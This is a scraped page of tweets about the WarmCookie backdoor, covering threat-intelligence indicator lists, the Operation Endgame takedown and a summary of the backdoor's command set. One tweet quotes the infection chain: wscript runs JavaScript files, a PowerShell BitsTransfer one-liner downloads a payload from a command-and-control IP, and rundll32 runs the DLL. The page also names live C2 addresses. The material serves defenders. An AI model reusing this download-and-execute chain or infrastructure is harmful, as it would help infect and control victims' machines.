Top Tweets for #warmcookie
Tracking #WARMCOOKIE C2 activity.
Core capabilities of the backdoor include fingerprinting hosts, reading/writing files, taking screenshots, and executing further payloads.
query: https://t.co/ZZxVr3Wseb
report: https://t.co/GVk5si9GAQ

Major update regarding the Malmons TCG! ๐จ
We are now actively developing the AR Malmons app for the TCG! ๐พ
Sponsors (Diamond, Gold, Silver, Bronze) and Adopt-a-Malmons are open until Nov 6 (limited slots available)! ๐
Support us on Kickstarter: https://t.co/hI0YM0OYBK
Demo of the 3D #WarmCookie Malmons for the upcoming Malmons AR Trading Card Game! ๐ช
Support us on Kickstarter, sponsorships open until Nov 6 2025:
https://t.co/hI0YM0Pwri
#malmons #kickstarter #AR #crowdfunding
โ ๏ธ WarmCookie resurfaces with stealth handlers
Malware reappears after takedown; new variant adds stealthy handlers and uses expired C2 TLS certificates to evade detection, strengthen persistence, and complicate tracking.
#ransomNews #WarmCookie #Malware

#ElasticSecurityLabs has kept tabs on #WARMCOOKIE, a backdoor we disclosed in June 2024 that used employment-related phishing lures to infect victims. Learn how this threatโs evolving: https://t.co/53KcLQHdQN
๐จ Operation Endgame is back and itโs hitting hard! The latest operation targets #Bumblebee, #Latrodectus, #Qakbot, #DanaBot, #Trickbot, and #WarmCookie.
Here are some of the headline stats:
๐ฅ๏ธ Over 300 computer servers worldwide have been taken offline
๐ More than 650 domain names have been taken over
๐ฐ EUR 3.5 million seized in cryptocurrency
๐ฎ 20 international arrest warrants issued
๐ค Joint actions carried out in Canada, Denmark, France, Germany, the Netherlands, UK, and US, with support from Europol and Eurojust.
Read @spamhaus Projectโs write-up here:
โก๏ธ https://t.co/2dtNhyh76d
Massive kudos to all involved in this takedown - well done, and thank you! ๐
๐ฅ Operation Endgame is BACK! This time targeting #BumbleBee, #Latrodectus, #DanaBot, #WarmCookie, #Qakbot and #Trickbot!
Once again this is a HUGE win, with a truly international effort! ๐ช
As with phase one of #OperationEndgame, Spamhaus are providing remediation support - those affected will be contacted in due course with steps to take.
For more information, read our write-up here:
๐ https://t.co/u0YQu0m7dt
๐ฅ Operation Endgame is BACK! This time targeting #BumbleBee, #Latrodectus, #DanaBot, #WarmCookie, #Qakbot and #Trickbot!
Once again this is a HUGE win, with a truly international effort! ๐ช
As with phase one of #OperationEndgame, Spamhaus are providing remediation support - those affected will be contacted in due course with steps to take.
For more information, read our write-up here:
๐ https://t.co/u0YQu0m7dt
๐ฅ Ransomware kill chain broken โ Operation Endgame strikes again
๐ธ 300 servers taken down
๐ธ 650 domains neutralised
๐ธ โฌ3.5M crypto seized
๐ธ 20 international arrest warrants
Europol & partners deliver another blow to global cybercrime.
More โคต๏ธ
https://t.co/oPx9U8HQSr

๐ Expanded my #Warmcookie hunt with the help from @SilentPush's ssdeep feature! ๐ต๏ธโโ๏ธ
Started with indicator 91.222.173.]219, pivoted via html ssdeep to uncover 64.7.198.]67 - clean on VT but with intriguing DGA domains. ๐จ
Further Shodan dive revealed unique html_hash:-366580237, potentially linked to #Coper #Android #malware? ๐ค
Check these IPs for related DGA infra:
64.7.198.]67
45.12.133.]239
95.141.41.]22
5.34.180.]187
95.141.41.]7
95.141.41.]21
5.34.180.]221
185.198.167.]99
95.141.41.]26
109.120.137.]103
212.81.47.]192
64.7.198.]190
154.216.19.]28
41.216.183.]253
#CyberSecurity #ThreatHunting
![TLP_R3D's tweet photo. ๐ Expanded my #Warmcookie hunt with the help from @SilentPush's ssdeep feature! ๐ต๏ธโโ๏ธ
Started with indicator 91.222.173.]219, pivoted via html ssdeep to uncover 64.7.198.]67 - clean on VT but with intriguing DGA domains. ๐จ
Further Shodan dive revealed unique html_hash:-366580237, potentially linked to #Coper #Android #malware? ๐ค
Check these IPs for related DGA infra:
64.7.198.]67
45.12.133.]239
95.141.41.]22
5.34.180.]187
95.141.41.]7
95.141.41.]21
5.34.180.]221
185.198.167.]99
95.141.41.]26
109.120.137.]103
212.81.47.]192
64.7.198.]190
154.216.19.]28
41.216.183.]253
#CyberSecurity #ThreatHunting](https://pbs.twimg.com/media/GeCZhU2XwAAPr8a.jpg)
#Fake #browser #Updates #spread #updated #WarmCookie #malware
#dataprotection #DataSecurity
https://t.co/epTikWMDLF
๐จ 'WarmCookie' Backdoor: A New Threat Disguised as Fake Updates! ๐จ
Details: https://t.co/HMis87ksTW
#FakeUpdate #WebBrowser #WarmCookie #backdoormalware #Threatfeed #SecureBlink

#ThreatProtection #WarmCookie #malware distributed via various campaigns, read more: https://t.co/TDtSK6zoVX
Cisco Talos has linked the #TA866 Group to the new WarmCookie malware, involved in the further distribution of CSharp-Streamer-RAT and Cobalt Strike on targeted systems.
#CyberSecurity #WarmCookie #Malware #CyberAttack
Read: https://t.co/koilDsxTXZ
Had fun presenting #WARMCOOKIE research at #VB2024. The malware was recently updated with new handlers. Our team wrote some tooling to simulate the C2 server to help organizations build better detections.
Tooling: https://t.co/GTeVTLDAaU
#ThreatProtection #FakeUpdate campaign delivering #WarmCookie malware targeting users in France. Read more: https://t.co/ffGnRsgxFu #CyberSecurity #Malware #Backdoor #SocGolish
๐ชFake browser updates spread updated WarmCookie malware๐ช
https://t.co/3qmqJiGfhe
#Cybersecurity #Malware #FakeUpdates #BrowserSecurity #WarmCookie #ThreatHunting #DigitalSafety #InformationSecurity

This analysis of #warmcookie allows us to use Validin track the malicious domain checkfedexp[.]com from behind Cloudflare to 147.45.116[.]30, then to the domain servermacosdomain[.]com (also Cloudflare), to the current IP 185.143.223[.]157.
Nice work, @techevo_!
![ValidinLLC's tweet photo. This analysis of #warmcookie allows us to use Validin track the malicious domain checkfedexp[.]com from behind Cloudflare to 147.45.116[.]30, then to the domain servermacosdomain[.]com (also Cloudflare), to the current IP 185.143.223[.]157.
Nice work, @techevo_! https://t.co/iJjVFToxfl](https://pbs.twimg.com/media/GYvhPMwWgAAAjP9.png)
I took a look at a #warmcookie infection, and wrote an investigation walk-through using a #PCAP from @malware_traffic, check it out: https://t.co/lUPWJxB2sb
๐จ Beware of an ongoing #FakeUpdate campaign targeting FR ๐ซ๐ท! Instead of the browser update, it spreads #WarmCookie #backdoor via compromised websites.
The #WarmCookie itself has been updated as well. The new version supports these commands:
1 - Get CPU identification and memory size
2 - Take screenshots
3 - Enum programs via Uninstall reg key
4 - cmd execution via cmd.exe /c and send back results via POST
5 - Write file to victim
6 - Read file and send it back
7 - empty
8 - Write DLL to %TEMP% and run it via rundll32.exe and send back the output
9 - missing
10 - Same as 8, but starts it with "Start /update" arguments
11 - Copies itself to %TEMP%
IoCs:
updatechrllom[.]com
javadevssdk[.]com
mozilaupgrade[.]com
edgeupgrade[.]com
elrifeno[.]com/temp/Install_x64[.]exe
44faed020d5d8b29918a3f02d757b2cfada67574cf9e02748ea7f75ba5878907
38[.]180[.]91[.]117
![GenThreatLabs's tweet photo. ๐จ Beware of an ongoing #FakeUpdate campaign targeting FR ๐ซ๐ท! Instead of the browser update, it spreads #WarmCookie #backdoor via compromised websites.
The #WarmCookie itself has been updated as well. The new version supports these commands:
1 - Get CPU identification and memory size
2 - Take screenshots
3 - Enum programs via Uninstall reg key
4 - cmd execution via cmd.exe /c and send back results via POST
5 - Write file to victim
6 - Read file and send it back
7 - empty
8 - Write DLL to %TEMP% and run it via rundll32.exe and send back the output
9 - missing
10 - Same as 8, but starts it with "Start /update" arguments
11 - Copies itself to %TEMP%
IoCs:
updatechrllom[.]com
javadevssdk[.]com
mozilaupgrade[.]com
edgeupgrade[.]com
elrifeno[.]com/temp/Install_x64[.]exe
44faed020d5d8b29918a3f02d757b2cfada67574cf9e02748ea7f75ba5878907
38[.]180[.]91[.]117](https://pbs.twimg.com/media/GYuyeG8WgAAcU9i.jpg)
Warmcookie Backdoor
59b7b8d29252a9128536fbd08d24375f
C2:
http://72.5.43.29/
#Warmcookie #Backdoor #Malware

#Warmcookie - #TA544 - .pdf > url > .zip > .js > .js > .dll
wscript Invoice.js
wscript 1337.js
powershell -nop -c start-job { param($a) Import-Module BitsTransfer; Start-BitsTransfer -Source 'http://72.5.43.]29/data/ee9362
rundll32 vlv.own,Start
IOC's
https://t.co/S5JHTGv6tu
![Cryptolaemus1's tweet photo. #Warmcookie - #TA544 - .pdf > url > .zip > .js > .js > .dll
wscript Invoice.js
wscript 1337.js
powershell -nop -c start-job { param($a) Import-Module BitsTransfer; Start-BitsTransfer -Source 'http://72.5.43.]29/data/ee9362
rundll32 vlv.own,Start
IOC's
https://t.co/S5JHTGv6tu https://t.co/gl9Uxk1rbZ](https://pbs.twimg.com/media/GU-BD2uXUAAcmj6.jpg)
๐จ #WarmCookie is a backdoor #malware with advanced evasion techniques
It sneaks into systems through job offer #phishing emails
๐ก๏ธ Learn how it operates and collect #IOCs ๐ https://t.co/5oMW5fA6CO

Last Seen Hashtags on Sotwe
Most Popular Users

Elon Musk 
@elonmusk
241.3M followers

Barack Obama 
@barackobama
119.1M followers

Cristiano Ronaldo 
@cristiano
113M followers

Donald J. Trump 
@realdonaldtrump
111.8M followers

Narendra Modi 
@narendramodi
107.1M followers

Rihanna 
@rihanna
98.3M followers

NASA 
@nasa
92.3M followers

Justin Bieber 
@justinbieber
91.5M followers

KATY PERRY 
@katyperry
89.1M followers

Taylor Swift 
@taylorswift13
83M followers

Lady Gaga 
@ladygaga
74.5M followers

Virat Kohli 
@imvkohli
72M followers

Kim Kardashian 
@kimkardashian
70.5M followers

YouTube 
@youtube
68.8M followers

Neymar Jr 
@neymarjr
65M followers

Bill Gates 
@billgates
64.7M followers

The Ellen Show
@theellenshow
62.4M followers

Selena Gomez 
@selenagomez
62.2M followers

CNN 
@cnn
61.8M followers

X 
@x
60.8M followers









![TLP_R3D's tweet photo. ๐ Expanded my #Warmcookie hunt with the help from @SilentPush's ssdeep feature! ๐ต๏ธโโ๏ธ
Started with indicator 91.222.173.]219, pivoted via html ssdeep to uncover 64.7.198.]67 - clean on VT but with intriguing DGA domains. ๐จ
Further Shodan dive revealed unique html_hash:-366580237, potentially linked to #Coper #Android #malware? ๐ค
Check these IPs for related DGA infra:
64.7.198.]67
45.12.133.]239
95.141.41.]22
5.34.180.]187
95.141.41.]7
95.141.41.]21
5.34.180.]221
185.198.167.]99
95.141.41.]26
109.120.137.]103
212.81.47.]192
64.7.198.]190
154.216.19.]28
41.216.183.]253
#CyberSecurity #ThreatHunting](https://pbs.twimg.com/media/GeCZU5dXAAAYIJF.jpg)







![ValidinLLC's tweet photo. This analysis of #warmcookie allows us to use Validin track the malicious domain checkfedexp[.]com from behind Cloudflare to 147.45.116[.]30, then to the domain servermacosdomain[.]com (also Cloudflare), to the current IP 185.143.223[.]157.
Nice work, @techevo_! https://t.co/iJjVFToxfl](https://pbs.twimg.com/media/GYvhBvgX0AA01nF.png)
![ValidinLLC's tweet photo. This analysis of #warmcookie allows us to use Validin track the malicious domain checkfedexp[.]com from behind Cloudflare to 147.45.116[.]30, then to the domain servermacosdomain[.]com (also Cloudflare), to the current IP 185.143.223[.]157.
Nice work, @techevo_! https://t.co/iJjVFToxfl](https://pbs.twimg.com/media/GYvg1NJXgAA5zZz.png)


![GenThreatLabs's tweet photo. ๐จ Beware of an ongoing #FakeUpdate campaign targeting FR ๐ซ๐ท! Instead of the browser update, it spreads #WarmCookie #backdoor via compromised websites.
The #WarmCookie itself has been updated as well. The new version supports these commands:
1 - Get CPU identification and memory size
2 - Take screenshots
3 - Enum programs via Uninstall reg key
4 - cmd execution via cmd.exe /c and send back results via POST
5 - Write file to victim
6 - Read file and send it back
7 - empty
8 - Write DLL to %TEMP% and run it via rundll32.exe and send back the output
9 - missing
10 - Same as 8, but starts it with "Start /update" arguments
11 - Copies itself to %TEMP%
IoCs:
updatechrllom[.]com
javadevssdk[.]com
mozilaupgrade[.]com
edgeupgrade[.]com
elrifeno[.]com/temp/Install_x64[.]exe
44faed020d5d8b29918a3f02d757b2cfada67574cf9e02748ea7f75ba5878907
38[.]180[.]91[.]117](https://pbs.twimg.com/media/GYuybA4W0AAOpn9.jpg)


